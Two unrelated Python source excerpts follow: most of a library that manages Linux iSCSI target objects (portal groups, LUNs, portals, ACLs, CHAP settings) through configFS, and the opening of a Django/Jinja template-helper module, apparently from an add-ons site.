and then the TPG itself. Before starting the actual deletion process,
all sessions will be disconnected.
'''
self._check_self()
self.enable = False
for acl in self.node_acls:
acl.delete()
for lun in self.luns:
lun.delete()
for portal in self.network_portals:
portal.delete()
super(TPG, self).delete()
def node_acl(self, node_wwn, mode='any'):
'''
Same as NodeACL() but without specifying the parent_tpg.
'''
self._check_self()
return NodeACL(self, node_wwn=node_wwn, mode=mode)
def network_portal(self, ip_address, port, mode='any'):
'''
Same as NetworkPortal() but without specifying the parent_tpg.
'''
self._check_self()
return NetworkPortal(self, ip_address=ip_address, port=port, mode=mode)
def lun(self, lun, storage_object=None, alias=None):
'''
Same as LUN() but without specifying the parent_tpg.
'''
self._check_self()
return LUN(self, lun=lun, storage_object=storage_object, alias=alias)
tag = property(_get_tag,
doc="Get the TPG Tag as an int.")
parent_target = property(_get_parent_target,
doc="Get the parent Target object to which the " \
+ "TPG is attached.")
enable = property(_get_enable, _set_enable,
doc="Get or set a boolean value representing the " \
+ "enable status of the TPG. " \
+ "True means the TPG is enabled, False means it is " \
+ "disabled.")
network_portals = property(_list_network_portals,
doc="Get the list of NetworkPortal objects currently attached " \
+ "to the TPG.")
node_acls = property(_list_node_acls,
doc="Get the list of NodeACL objects currently " \
+ "attached to the TPG.")
node_acl_groups = property(_list_node_acl_groups,
doc="Get the list of NodeACL groups currently " \
+ "attached to the TPG.")
luns = property(_list_luns,
doc="Get the list of LUN objects currently attached " \
+ "to the TPG.")
nexus = property(_get_nexus, _set_nexus,
doc="Get or set (once) the TPG's Nexus is used.")
chap_userid = property(partial(_get_auth_attr, attribute='auth/userid', ignore=True),
partial(_set_auth_attr, attribute='auth/userid', ignore=True),
doc="Set or get the initiator CHAP auth userid.")
chap_password = property(partial(_get_auth_attr, attribute='auth/password', ignore=True),
partial(_set_auth_attr, attribute='auth/password', ignore=True),
doc="Set or get the initiator CHAP auth password.")
chap_mutual_userid = property(partial(_get_auth_attr, attribute='auth/userid_mutual', ignore=True),
partial(_set_auth_attr, attribute='auth/userid_mutual', ignore=True),
doc="Set or get the initiator CHAP auth userid.")
chap_mutual_password = property(partial(_get_auth_attr, attribute='auth/password_mutual', ignore=True),
partial(_set_auth_attr, attribute='auth/password_mutual', ignore=True),
doc="Set or get the initiator CHAP auth password.")
def _get_authenticate_target(self):
self._check_self()
path = "%s/auth/authenticate_target" % self.path
try:
return bool(int(fread(path)))
except:
return None
authenticate_target = property(_get_authenticate_target,
doc="Get the boolean authenticate target flag.")
@classmethod
def setup(cls, t_obj, tpg, err_func):
tpg_obj = cls(t_obj, tag=tpg.get("tag", None))
set_attributes(tpg_obj, tpg.get('attributes', {}), err_func)
set_parameters(tpg_obj, tpg.get('parameters', {}), err_func)
for lun in tpg.get('luns', []):
LUN.setup(tpg_obj, lun, err_func)
for p in tpg.get('portals', []):
NetworkPortal.setup(tpg_obj, p, err_func)
for acl in tpg.get('node_acls', []):
NodeACL.setup(tpg_obj, acl, err_func)
tpg_obj.enable = tpg.get('enable', True)
dict_remove(tpg, ('luns', 'portals', 'node_acls', 'tag',
'attributes', 'parameters', 'enable'))
for name, value in six.iteritems(tpg):
if value:
try:
setattr(tpg_obj, name, value)
except:
err_func("Could not set tpg %s attribute '%s'" %
(tpg_obj.tag, name))
def dump(self):
d = super(TPG, self).dump()
d['tag'] = self.tag
d['enable'] = self.enable
d['luns'] = [lun.dump() for lun in self.luns]
d['portals'] = [portal.dump() for portal in self.network_portals]
d['node_acls'] = [acl.dump() for acl in self.node_acls]
if self.has_feature("auth"):
for attr in auth_params:
val = getattr(self, "chap_" + attr, None)
if val:
d["chap_" + attr] = val
return d
class LUN(CFSNode):
'''
This is an interface to RTS Target LUNs in configFS.
A LUN is identified by its parent TPG and LUN index.
'''
MAX_LUN = 255
# LUN private stuff
def __repr__(self):
return "<LUN %d (%s/%s)>" % (self.lun, self.storage_object.plugin,
self.storage_object.name)
def __init__(self, parent_tpg, lun=None, storage_object=None, alias=None):
'''
A LUN object can be instanciated in two ways:
- B{Creation mode}: If I{storage_object} is specified, the
underlying configFS object will be created with that parameter.
No LUN with the same I{lun} index can pre-exist in the parent TPG
in that mode, or instanciation will fail.
- B{Lookup mode}: If I{storage_object} is not set, then the LUN
will be bound to the existing configFS LUN object of the parent
TPG having the specified I{lun} index. The underlying configFS
object must already exist in that mode.
@param parent_tpg: The parent TPG object.
@type parent_tpg: TPG
@param lun: The LUN index.
@type lun: 0-255
@param storage_object: The storage object to be exported as a LUN.
@type storage_object: StorageObject subclass
@param alias: An optional parameter to manually specify the LUN alias.
You probably do not need this.
@type alias: string
@return: A LUN object.
'''
super(LUN, self).__init__()
if isinstance(parent_tpg, TPG):
self._parent_tpg = parent_tpg
else:
raise RTSLibError("Invalid parent TPG")
if lun is None:
luns = [l.lun for l in self.parent_tpg.luns]
for index in range(self.MAX_LUN+1):
if index not in luns:
lun = index
break
if lun is None:
raise RTSLibError("All LUNs 0-%d in use" % self.MAX_LUN)
else:
lun = int(lun)
if lun < 0 or lun > self.MAX_LUN:
raise RTSLibError("LUN must be 0 to %d" % self.MAX_LUN)
self._lun = lun
self._path = "%s/lun/lun_%d" % (self.parent_tpg.path, self.lun)
if storage_object is None and alias is not None:
raise RTSLibError("The alias parameter has no meaning " \
+ "without the storage_object parameter")
if storage_object is not None:
self._create_in_cfs_ine('create')
try:
self._configure(storage_object, alias)
except:
self.delete()
raise
else:
self._create_in_cfs_ine('lookup')
def _configure(self, storage_object, alias):
self._check_self()
if alias is None:
alias = str(uuid.uuid4())[-10:]
else:
alias = str(alias).strip()
if '/' in alias:
raise RTSLibError("Invalid alias: %s", alias)
destination = "%s/%s" % (self.path, alias)
if storage_object.exists:
source = storage_object.path
else:
raise RTSLibError("storage_object does not exist in configFS")
os.symlink(source, destination)
def _get_alias(self):
self._check_self()
for path in os.listdir(self.path):
if os.path.islink("%s/%s" % (self.path, path)):
return os.path.basename(path)
raise RTSLibBrokenLink("Broken LUN in configFS, no storage object")
def _get_storage_object(self):
self._check_self()
alias_path = os.path.realpath("%s/%s" % (self.path, self.alias))
return tcm.StorageObject.so_from_path(alias_path)
def _get_parent_tpg(self):
return self._parent_tpg
def _get_lun(self):
return self._lun
def _list_mapped_luns(self):
self._check_self()
tpg = self.parent_tpg
if not tpg.has_feature('acls'):
return
for na in tpg.node_acls:
for mlun in na.mapped_luns:
if os.path.realpath("%s/%s" % (mlun.path, mlun.alias)) == self.path:
yield mlun
# LUN public stuff
def delete(self):
'''
If the underlying configFS object does not exist, this method does
nothing. If the underlying configFS object exists, this method attempts
to delete it along with all MappedLUN objects referencing that LUN.
'''
self._check_self()
for mlun in self.mapped_luns:
mlun.delete()
try:
link = self.alias
except RTSLibBrokenLink:
pass
else:
if os.path.islink("%s/%s" % (self.path, link)):
os.unlink("%s/%s" % (self.path, link))
super(LUN, self).delete()
parent_tpg = property(_get_parent_tpg,
doc="Get the parent TPG object.")
lun = property(_get_lun,
doc="Get the LUN index as an int.")
storage_object = property(_get_storage_object,
doc="Get the storage object attached to the LUN.")
alias = property(_get_alias,
doc="Get the LUN alias.")
mapped_luns = property(_list_mapped_luns,
doc="List all MappedLUN objects referencing this LUN.")
@classmethod
def setup(cls, tpg_obj, lun, err_func):
if 'index' not in lun:
err_func("'index' missing from a LUN in TPG %d" % tpg_obj.tag)
return
try:
bs_name, so_name = lun['storage_object'].split('/')[2:]
except:
err_func("Malformed storage object field for LUN %d" % lun['index'])
return
for so in tcm.StorageObject.all():
if so_name == so.name and bs_name == so.plugin:
match_so = so
break
else:
err_func("Could not find matching StorageObject for LUN %d" % lun['index'])
return
try:
cls(tpg_obj, lun['index'], storage_object=match_so)
except (RTSLibError, KeyError):
err_func("Creating TPG %d LUN index %d failed" %
(tpg_obj.tag, lun['index']))
def dump(self):
d = super(LUN, self).dump()
d['storage_object'] = "/backstores/%s/%s" % \
(self.storage_object.plugin, self.storage_object.name)
d['index'] = self.lun
return d
class NetworkPortal(CFSNode):
'''
This is an interface to NetworkPortals in configFS. A NetworkPortal is
identified by its IP and port, but here we also require the parent TPG, so
instance objects represent both the NetworkPortal and its association to a
TPG. This is necessary to get path information in order to create the
portal in the proper configFS hierarchy.
'''
# NetworkPortal private stuff
def __repr__(self):
return "<NetworkPortal %s port %s>" % (self.ip_address, self.port)
def __init__(self, parent_tpg, ip_address, port=3260, mode='any'):
'''
@param parent_tpg: The parent TPG object.
@type parent_tpg: TPG
@param ip_address: The ipv4/v6 IP address of the NetworkPortal. ipv6
addresses should be surrounded by '[]'.
@type ip_address: string
@param port: The optional (defaults to 3260) NetworkPortal TCP/IP port.
@type port: int
@param mode: An optionnal string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up or
created.
- I{'lookup'} means the object MUST already exist configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode:string
@return: A NetworkPortal object.
'''
super(NetworkPortal, self).__init__()
self._ip_address = str(ip_address)
try:
self._port = int(port)
except ValueError:
raise RTSLibError("Invalid port")
if isinstance(parent_tpg, TPG):
self._parent_tpg = parent_tpg
else:
raise RTSLibError("Invalid parent TPG")
self._path = "%s/np/%s:%d" \
% (self.parent_tpg.path, self.ip_address, self.port)
try:
self._create_in_cfs_ine(mode)
except OSError as msg:
raise RTSLibError(msg)
def _get_ip_address(self):
return self._ip_address
def _get_port(self):
return self._port
def _get_parent_tpg(self):
return self._parent_tpg
def _get_iser(self):
try:
return bool(int(fread("%s/iser" % self.path)))
except IOError:
return False
def _set_iser(self, boolean):
path = "%s/iser" % self.path
try:
fwrite(path, str(int(boolean)))
except IOError:
# b/w compat: don't complain if iser entry is missing
if os.path.isfile(path):
raise RTSLibError("Cannot change iser")
# NetworkPortal public stuff
def delete(self):
self.iser = False
super(NetworkPortal, self).delete()
parent_tpg = property(_get_parent_tpg,
doc="Get the parent TPG object.")
port = property(_get_port,
doc="Get the NetworkPortal's TCP port as an int.")
ip_address = property(_get_ip_address,
doc="Get the NetworkPortal's IP address as a string.")
iser = property(_get_iser, _set_iser,
doc="Get or set a boolean value representing if this " \
+ "NetworkPortal supports iSER.")
@classmethod
def setup(cls, tpg_obj, p, err_func):
if 'ip_address' not in p:
err_func("'ip_address' field missing from a portal in TPG %d" % tpg_obj.tag)
return
if 'port' not in p:
err_func("'port' field missing from a portal in TPG %d" % tpg_obj.tag)
return
try:
np = cls(tpg_obj, p['ip_address'], p['port'])
np.iser = p.get('iser', False)
except (RTSLibError, KeyError) as e:
err_func("Creating NetworkPortal object %s:%s failed: %s" %
(p['ip_address'], p['port'], e))
def dump(self):
d = super(NetworkPortal, self).dump()
d['port'] = self.port
d['ip_address'] = self.ip_address
d['iser'] = self.iser
return d
class NodeACL(CFSNode):
'''
This is an interface to node ACLs in configFS.
A NodeACL is identified by the initiator node wwn and parent TPG.
'''
# NodeACL private stuff
def __repr__(self):
return "<NodeACL %s>" % self.node_wwn
def __init__(self, parent_tpg, node_wwn, mode='any'):
'''
@param parent_tpg: The parent TPG object.
@type parent_tpg: TPG
@param node_wwn: The wwn of the initiator node for which the ACL is
created.
@type node_wwn: string
@param mode:An optionnal string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up or
created.
- I{'lookup'} means the object MUST already exist configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode:string
@return: A NodeACL object.
'''
super(NodeACL, self).__init__()
if isinstance(parent_tpg, TPG):
self._parent_tpg = parent_tpg
else:
raise RTSLibError("Invalid parent TPG")
fm = self.parent_tpg.parent_target.fabric_module
self._node_wwn, self.wwn_type = normalize_wwn(fm.wwn_types, node_wwn)
self._path = "%s/acls/%s" % (self.parent_tpg.path, fm.to_fabric_wwn(self.node_wwn))
self._create_in_cfs_ine(mode)
def _get_node_wwn(self):
return self._node_wwn
def _get_parent_tpg(self):
return self._parent_tpg
def _get_tcq_depth(self):
self._check_self()
path = "%s/cmdsn_depth" % self.path
return fread(path)
def _set_tcq_depth(self, depth):
self._check_self()
path = "%s/cmdsn_depth" % self.path
try:
fwrite(path, "%s" % depth)
except IOError as msg:
msg = msg[1]
raise RTSLibError("Cannot set tcq_depth: %s" % str(msg))
def _get_tag(self):
self._check_self()
try:
tag = fread("%s/tag" % self.path)
if tag:
return tag
return None
except IOError:
return None
def _set_tag(self, tag_str):
with ignored(IOError):
if tag_str is None:
fwrite("%s/tag" % self.path, 'NULL')
else:
fwrite("%s/tag" % self.path, tag_str)
def _list_mapped_luns(self):
self._check_self()
for mapped_lun_dir in glob("%s/lun_*" % self.path):
mapped_lun = int(os.path.basename(mapped_lun_dir).split("_")[1])
yield MappedLUN(self, mapped_lun)
def _get_session(self):
try:
lines = fread("%s/info" % self.path).splitlines()
except IOError:
return None
if lines[0].startswith("No active"):
return None
session = {}
for line in lines:
if line.startswith("InitiatorName:"):
session['parent_nodeacl'] = self
session['connections'] = []
elif line.startswith("InitiatorAlias:"):
session['alias'] = line.split(":")[1].strip()
elif line.startswith("LIO Session ID:"):
session['id'] = int(line.split(":")[1].split()[0])
session['type'] = line.split("SessionType:")[1].split()[0].strip()
elif "TARG_SESS_STATE_" in line:
session['state'] = line.split("_STATE_")[1].split()[0]
elif "TARG_CONN_STATE_" in line:
cid = int(line.split(":")[1].split()[0])
cstate = line.split("_STATE_")[1].split()[0]
session['connections'].append(dict(cid=cid, cstate=cstate))
elif "Address" in line:
session['connections'][-1]['address'] = line.split()[1]
session['connections'][-1]['transport'] = line.split()[2]
return session
# NodeACL public stuff
def has_feature(self, feature):
'''
Whether or not this NodeACL has a certain feature.
'''
return self.parent_tpg.has_feature(feature)
def delete(self):
'''
Delete the NodeACL, including all MappedLUN objects.
If the underlying configFS object does not exist, this method does
nothing.
'''
self._check_self()
for mapped_lun in self.mapped_luns:
mapped_lun.delete()
super(NodeACL, self).delete()
def mapped_lun(self, mapped_lun, tpg_lun=None, write_protect=None):
'''
Same as MappedLUN() but without the parent_nodeacl parameter.
'''
self._check_self()
return MappedLUN(self, mapped_lun=mapped_lun, tpg_lun=tpg_lun,
write_protect=write_protect)
tcq_depth = property(_get_tcq_depth, _set_tcq_depth,
doc="Set or get the TCQ depth for the initiator " \
+ "sessions matching this NodeACL.")
tag = property(_get_tag, _set_tag,
doc="Set or get the NodeACL tag. If not supported, return None")
parent_tpg = property(_get_parent_tpg,
doc="Get the parent TPG object.")
node_wwn = property(_get_node_wwn,
doc="Get the node wwn.")
mapped_luns = property(_list_mapped_luns,
doc="Get the list of all MappedLUN objects in this NodeACL.")
session = property(_get_session,
doc="Gives a snapshot of the current session or C{None}")
chap_userid = property(partial(_get_auth_attr, attribute='auth/userid'),
partial(_set_auth_attr, attribute='auth/userid'),
doc="Set or get the initiator CHAP auth userid.")
chap_password = property(partial(_get_auth_attr, attribute='auth/password'),
partial(_set_auth_attr, attribute='auth/password',),
doc="Set or get the initiator CHAP auth password.")
chap_mutual_userid = property(partial(_get_auth_attr, attribute='auth/userid_mutual'),
partial(_set_auth_attr, attribute='auth/userid_mutual'),
doc="Set or get the initiator CHAP auth userid.")
chap_mutual_password = property(partial(_get_auth_attr, attribute='auth/password_mutual'),
partial(_set_auth_attr, attribute='auth/password_mutual'),
doc="Set or get the initiator CHAP auth password.")
def _get_authenticate_target(self):
self._check_self()
path = "%s/auth/authenticate_target" % self.path
return bool(int(fread(path)))
authenticate_target = property(_get_authenticate_target,
doc="Get the boolean authenticate target flag.")
@classmethod
def setup(cls, tpg_obj, acl, err_func):
if 'node_wwn' not in acl:
err_func("'node_wwn' missing in node_acl")
return
try:
acl_obj = cls(tpg_obj, acl['node_wwn'])
except RTSLibError as e:
err_func("Error when creating NodeACL for %s: %s" % (acl['node_wwn'], e))
return
set_attributes(acl_obj, acl.get('attributes', {}), err_func)
for mlun in acl.get('mapped_luns', []):
MappedLUN.setup(tpg_obj, acl_obj, mlun, err_func)
dict_remove(acl, ('attributes', 'mapped_luns', 'node_wwn'))
for name, value in six.iteritems(acl):
if value:
try:
setattr(acl_obj, name, value)
except:
err_func("Could not set nodeacl %s attribute '%s'" %
(acl['node_wwn'], name))
def dump(self):
d = super(NodeACL, self).dump()
d['node_wwn'] = self.node_wwn
d['mapped_luns'] = [lun.dump() for lun in self.mapped_luns]
if self.tag:
d['tag'] = self.tag
if self.has_feature("auth"):
for attr in auth_params:
val = getattr(self, "chap_" + attr, None)
if val:
d["chap_" + attr] = val
return d
class MappedLUN(CFSNode):
'''
This is an interface to RTS Target Mapped LUNs.
A MappedLUN is a mapping of a TPG LUN to a specific initiator node, and is
part of a NodeACL. It allows the initiator to actually access the TPG LUN
if ACLs are enabled for the TPG. The initial TPG LUN will then be seen by
the initiator node as the MappedLUN.
'''
# MappedLUN private stuff
def __repr__(self):
return "<MappedLUN %s lun %d -> tpg%d lun %d>" % \
(self.parent_nodeacl.node_wwn, self.mapped_lun,
self.parent_nodeacl.parent_tpg.tag, self.tpg_lun.lun)
def __init__(self, parent_nodeacl, mapped_lun,
tpg_lun=None, write_protect=None):
'''
A MappedLUN object can be instanciated in two ways:
- B{Creation mode}: If I{tpg_lun} is specified, the underlying
configFS object will be created with that parameter. No MappedLUN
with the same I{mapped_lun} index can pre-exist in the parent
NodeACL in that mode, or instanciation will fail.
- B{Lookup mode}: If I{tpg_lun} is not set, then the MappedLUN will
be bound to the existing configFS MappedLUN object of the parent
NodeACL having the specified I{mapped_lun} index. The underlying
configFS object must already exist in that mode.
@param mapped_lun: The mapped LUN index.
@type mapped_lun: int
@param tpg_lun: The TPG LUN index to map, or directly a LUN object that
belong to the same TPG as the
parent NodeACL.
@type tpg_lun: int or LUN
@param write_protect: The write-protect flag value, defaults to False
(write-protection disabled).
@type write_protect: bool
'''
super(MappedLUN, self).__init__()
if not isinstance(parent_nodeacl, NodeACL):
raise RTSLibError("The parent_nodeacl parameter must be " \
+ "a NodeACL object")
else:
self._parent_nodeacl = parent_nodeacl
if not parent_nodeacl.exists:
raise RTSLibError("The parent_nodeacl does not exist")
try:
self._mapped_lun = int(mapped_lun)
except ValueError:
raise RTSLibError("The mapped_lun parameter must be an " \
+ "integer value")
self._path = "%s/lun_%d" % (self.parent_nodeacl.path, self.mapped_lun)
if tpg_lun is None and write_protect is not None:
raise RTSLibError("The write_protect parameter has no " \
+ "meaning without the tpg_lun parameter")
if tpg_lun is not None:
self._create_in_cfs_ine('create')
try:
self._configure(tpg_lun, write_protect)
except:
self.delete()
raise
else:
self._create_in_cfs_ine('lookup')
def _configure(self, tpg_lun, write_protect):
self._check_self()
if isinstance(tpg_lun, LUN):
tpg_lun = tpg_lun.lun
else:
try:
tpg_lun = int(tpg_lun)
except ValueError:
raise RTSLibError("The tpg_lun must be either an "
+ "integer or a LUN object")
# Check that the tpg_lun exists in the TPG
for lun in self.parent_nodeacl.parent_tpg.luns:
if lun.lun == tpg_lun:
tpg_lun = lun
break
if not (isinstance(tpg_lun, LUN) and tpg_lun):
raise RTSLibError("LUN %s does not exist in this TPG"
% str(tpg_lun))
os.symlink(tpg_lun.path, "%s/%s"
% (self.path, str(uuid.uuid4())[-10:]))
try:
self.write_protect = int(write_protect) > 0
except:
self.write_protect = False
def _get_alias(self):
self._check_self()
for path in os.listdir(self.path):
if os.path.islink("%s/%s" % (self.path, path)):
return os.path.basename(path)
raise RTSLibBrokenLink("Broken LUN in configFS, no storage object")
def _get_mapped_lun(self):
return self._mapped_lun
def _get_parent_nodeacl(self):
return self._parent_nodeacl
def _set_write_protect(self, write_protect):
self._check_self()
path = "%s/write_protect" % self.path
if write_protect:
fwrite(path, "1")
else:
fwrite(path, "0")
def _get_write_protect(self):
self._check_self()
path = "%s/write_protect" % self.path
return bool(int(fread(path)))
def _get_tpg_lun(self):
self._check_self()
path = os.path.realpath("%s/%s" % (self.path, self.alias))
for lun in self.parent_nodeacl.parent_tpg.luns:
if lun.path == path:
return lun
raise RTSLibBrokenLink("Broken MappedLUN, no TPG LUN found")
def _get_node_wwn(self):
self._check_self()
return self.parent_nodeacl.node_wwn
# MappedLUN public stuff
def delete(self):
'''
Delete the MappedLUN.
'''
self._check_self()
try:
lun_link = "%s/%s" % (self.path, self.alias)
except RTSLibBrokenLink:
pass
else:
if os.path.islink(lun_link):
os.unlink(lun_link)
super(MappedLUN, self).delete()
mapped_lun = property(_get_mapped_lun,
doc="Get the integer MappedLUN mapped_lun index.")
parent_nodeacl = property(_get_parent_nodeacl,
doc="Get the parent NodeACL object.")
write_protect = property(_get_write_protect, _set_write_protect,
doc="Get or set the boolean write protection.")
tpg_lun = property(_get_tpg_lun,
doc="Get the TPG LUN object the MappedLUN is pointing at.")
node_wwn = property(_get_node_wwn,
doc="Get the wwn of the node for which the TPG LUN is mapped.")
alias = property(_get_alias,
doc="Get the MappedLUN alias.")
@classmethod
def setup(cls, tpg_obj, acl_obj, mlun, err_func):
if 'tpg_lun' not in mlun:
err_func("'tpg_lun' not in a mapped_lun")
return
if 'index' not in mlun:
err_func("'index' not in a mapped_lun")
return
# Mapped lun needs to correspond with already-created
# TPG lun
for lun in tpg_obj.luns:
if lun.lun == mlun['tpg_lun']:
tpg_lun_obj = lun
break
else:
err_func("Could not find matching TPG LUN %d for MappedLUN %s" %
(mlun['tpg_lun'], mlun['index']))
return
try:
mlun_obj = cls(acl_obj, mlun['index'],
tpg_lun_obj, mlun.get('write_protect'))
mlun_obj.tag = mlun.get("tag", None)
except (RTSLibError, KeyError):
err_func("Creating MappedLUN object %d failed" % mlun['index'])
def dump(self):
d = super(MappedLUN, self).dump()
d['write_protect'] = self.write_protect
d['index'] = self.mapped_lun
d['tpg_lun'] = self.tpg_lun.lun
return d
class Group(object):
'''
An abstract base class akin to CFSNode, but for classes that
emulate a higher-level group object across the actual NodeACL
configfs structure.
'''
def __init__(self, members_func):
'''
members_func is a function that takes a self argument
and returns an iterator of the objects that the
derived Group class is grouping.
'''
self._mem_func = members_func
def _get_first_member(self):
try:
return next(self._mem_func(self))
except StopIteration:
raise IndexError("Group is empty")
def _get_prop(self, prop):
'''
Helper fn to use with partial() to support getting a
property value from the first member of the group.
(All members of the group should be identical.)
'''
return getattr(self._get_first_member(), prop)
def _set_prop(self, value, prop):
'''
Helper fn to use with partial() to support setting a
property value in all members of the group.
Caution: Arguments reversed!
This is so partial() can be used on property name.
'''
for mem in self._mem_func(self):
setattr(mem, prop, value)
def list_attributes(self, writable=None):
return self._get_first_member().list_attributes(writable)
def list_parameters(self, writable=None):
return self._get_first_member().list_parameters(writable)
def set_attribute(self, attribute, value):
for obj in self._mem_func(self):
obj.set_attribute(attribute, value)
def set_parameter(self, parameter, value):
for obj in self._mem_func(self):
obj.set_parameter(parameter, value)
def get_attribute(self, attribute):
return self._get_first_member().get_attribute(attribute)
def get_parameter(self, parameter):
return self._get_first_member().get_parameter(parameter)
def delete(self):
'''
Delete all members of the group.
'''
for mem in self._mem_func(self):
mem.delete()
@property
def exists(self):
return any(self._mem_func(self))
def _check_group_name(name):
# Since all WWNs have a '.' in them, let's avoid confusion.
if '.' in name:
raise RTSLibError("'.' not permitted in group names.")
class NodeACLGroup(Group):
'''
Allow a group of NodeACLs that share a tag to be managed collectively.
'''
def __repr__(self):
return "<NodeACLGroup %s>" % self.name
def __init__(self, parent_tpg, name):
super(NodeACLGroup, self).__init__(NodeACLGroup._node_acls.fget)
_check_group_name(name)
self._name = name
self._parent_tpg = parent_tpg
def _get_name(self):
return self._name
def _set_name(self, name):
_check_group_name(name)
for na in self._node_acls:
na.tag = name
self._name = name
@property
def parent_tpg(self):
'''
Get the parent TPG object.
'''
return self._parent_tpg
def add_acl(self, node_wwn):
'''
Add a WWN to the NodeACLGroup. If a NodeACL already exists for this WWN,
its configuration will be changed to match the NodeACLGroup, except for its
auth parameters, which can vary among group members.
@param node_wwn: An initiator WWN
@type node_wwn: string
'''
nacl = NodeACL(self.parent_tpg, node_wwn)
if nacl in self._node_acls:
return
# if joining a group, take its config
try:
model = next(self._node_acls)
except StopIteration:
pass
else:
for mlun in nacl.mapped_luns:
mlun.delete()
for mlun in model.mapped_luns:
MappedLUN(nacl, mlun.mapped_lun, mlun.tpg_lun, mlun.write_protect)
for item in model.list_attributes(writable=True):
nacl.set_attribute(item, model.get_attribute(item))
for item in model.list_parameters(writable=True):
nacl.set_parameter(item, model.get_parameter(item))
finally:
nacl.tag = self.name
def remove_acl(self, node_wwn):
'''
Remove a WWN from the NodeACLGroup.
@param node_wwn: An initiator WWN
@type node_wwn: string
'''
nacl = NodeACL(self.parent_tpg, node_wwn, mode='lookup')
nacl.delete()
@property
def _node_acls(self):
'''
Gives access to the underlying NodeACLs within this group.
'''
for na in self.parent_tpg.node_acls:
if na.tag == self.name:
yield na
@property
def wwns(self):
'''
Give the Node WWNs of members of this group.
'''
return (na.node_wwn for na in self._node_acls)
def has_feature(self, feature):
'''
Whether or not this NodeACL has a certain feature.
'''
return self._parent_tpg.has_feature(feature)
@property
def sessions(self):
'''
Yields any current sessions.
'''
for na in self._node_acls:
session = na.session
if session:
yield session
def mapped_lun_group(self, mapped_lun, tpg_lun=None, write_protect=None):
'''
Add a mapped lun to all group members.
'''
return MappedLUNGroup(self, mapped_lun=mapped_lun, tpg_lun=tpg_lun,
write_protect=write_protect)
@property
def mapped_lun_groups(self):
'''
Generates all MappedLUNGroup objects in this NodeACLGroup.
'''
try:
first = self._get_first_member()
except IndexError:
return
for mlun in first.mapped_luns:
yield MappedLUNGroup(self, mlun.mapped_lun)
name = property(_get_name, _set_name,
doc="Get/set NodeACLGroup name.")
def _get_chap(self, name):
for na in self._node_acls:
yield (na.node_wwn, getattr(na, "chap_" + name))
def _set_chap(self, name, value, wwn):
for na in self._node_acls:
if not wwn:
setattr(na, "chap_" + name, value)
elif wwn == na.node_wwn:
setattr(na, "chap_" + name, value)
break
def get_userids(self):
'''
Returns a (wwn, userid) tuple for each member of the group.
'''
return self._get_chap(name="userid")
def set_userids(self, value, wwn=None):
'''
If wwn, set the userid for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("userid", value, wwn)
def get_passwords(self):
'''
Returns a (wwn, password) tuple for each member of the group.
'''
return self._get_chap(name="password")
def set_passwords(self, value, wwn=None):
'''
If wwn, set the password for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("password", value, wwn)
def get_mutual_userids(self):
'''
Returns a (wwn, mutual_userid) tuple for each member of the group.
'''
return self._get_chap(name="mutual_userid")
def set_mutual_userids(self, value, wwn=None):
'''
If wwn, set the mutual_userid for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("mutual_userid", value, wwn)
def get_mutual_passwords(self):
'''
Returns a (wwn, mutual_password) tuple for each member of the group.
'''
return self._get_chap(name="mutual_password")
def set_mutual_passwords(self, value, wwn=None):
'''
If wwn, set the mutual_password for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("mutual_password", value, wwn)
tcq_depth = property(partial(Group._get_prop, prop="tcq_depth"),
partial(Group._set_prop, prop="tcq_depth"),
doc="Set or get the TCQ depth for the initiator "
+ "sessions matching this NodeACLGroup")
authenticate_target = property(partial(Group._get_prop, prop="authenticate_target"),
doc="Get the boolean authenticate target flag.")
class MappedLUNGroup(Group):
'''
Used with NodeACLGroup, this aggregates all MappedLUNs with the same LUN
so that it can be configured across all members of the NodeACLGroup.
'''
def __repr__(self):
return "<MappedLUNGroup %s:lun %d>" % (self._nag.name, self._mapped_lun)
def __init__(self, nodeaclgroup, mapped_lun, *args, **kwargs):
super(MappedLUNGroup, self).__init__(MappedLUNGroup._mapped_luns.fget)
self._nag = nodeaclgroup
self._mapped_lun = mapped_lun
for na in self._nag._node_acls:
MappedLUN(na, mapped_lun=mapped_lun, *args, **kwargs)
@property
def _mapped_luns(self):
for na in self._nag._node_acls:
for mlun in na.mapped_luns:
if mlun.mapped_lun == self.mapped_lun:
yield mlun
@property
def mapped_lun(self):
'''
Get the integer MappedLUN mapped_lun index.
'''
return self._mapped_lun
@property
def parent_nodeaclgroup(self):
'''
Get the parent NodeACLGroup object.
'''
return self._nag
write_protect = property(partial(Group._get_prop, prop="write_protect"),
partial(Group._set_prop, prop="write_protect"),
doc="Get or set the boolean write protection.")
tpg_lun = property(partial(Group._get_prop, prop="tpg_lun"),
doc="Get the TPG LUN object the MappedLUN is pointing at.")
def _test():
from doctest import testmod
testmod()
if __name__ == "__main__":
_test()
|
|
import collections
import decimal
import json as jsonlib
import os
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.utils.translation import (
ugettext, trim_whitespace, to_locale, get_language)
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.template import defaultfilters
from django.utils.functional import lazy
from django.utils.safestring import mark_safe
import caching.base as caching
import jinja2
import waffle
from babel.support import Format
from jingo import register, get_env
# Needed to make sure our own |f filter overrides jingo's one.
from jingo import helpers # noqa
from jingo_minify.helpers import (
_build_html, _get_compiled_css_url, get_path, is_external)
from olympia import amo
from olympia.amo import utils, urlresolvers
from olympia.constants.licenses import PERSONA_LICENSES_IDS
# Yanking filters from Django.
register.filter(defaultfilters.slugify)
# Registering some utils as filters:
urlparams = register.filter(utils.urlparams)
register.filter(utils.epoch)
register.filter(utils.isotime)
register.function(dict)
register.function(utils.randslice)
# Mark a lazy marked instance as safe but keep
# it lazy
mark_safe_lazy = lazy(mark_safe, unicode)
@register.function
def switch_is_active(switch_name):
return waffle.switch_is_active(switch_name)
@register.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@register.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@register.filter
def babel_datetime(dt, format='medium'):
return _get_format().datetime(dt, format=format) if dt else ''
@register.filter
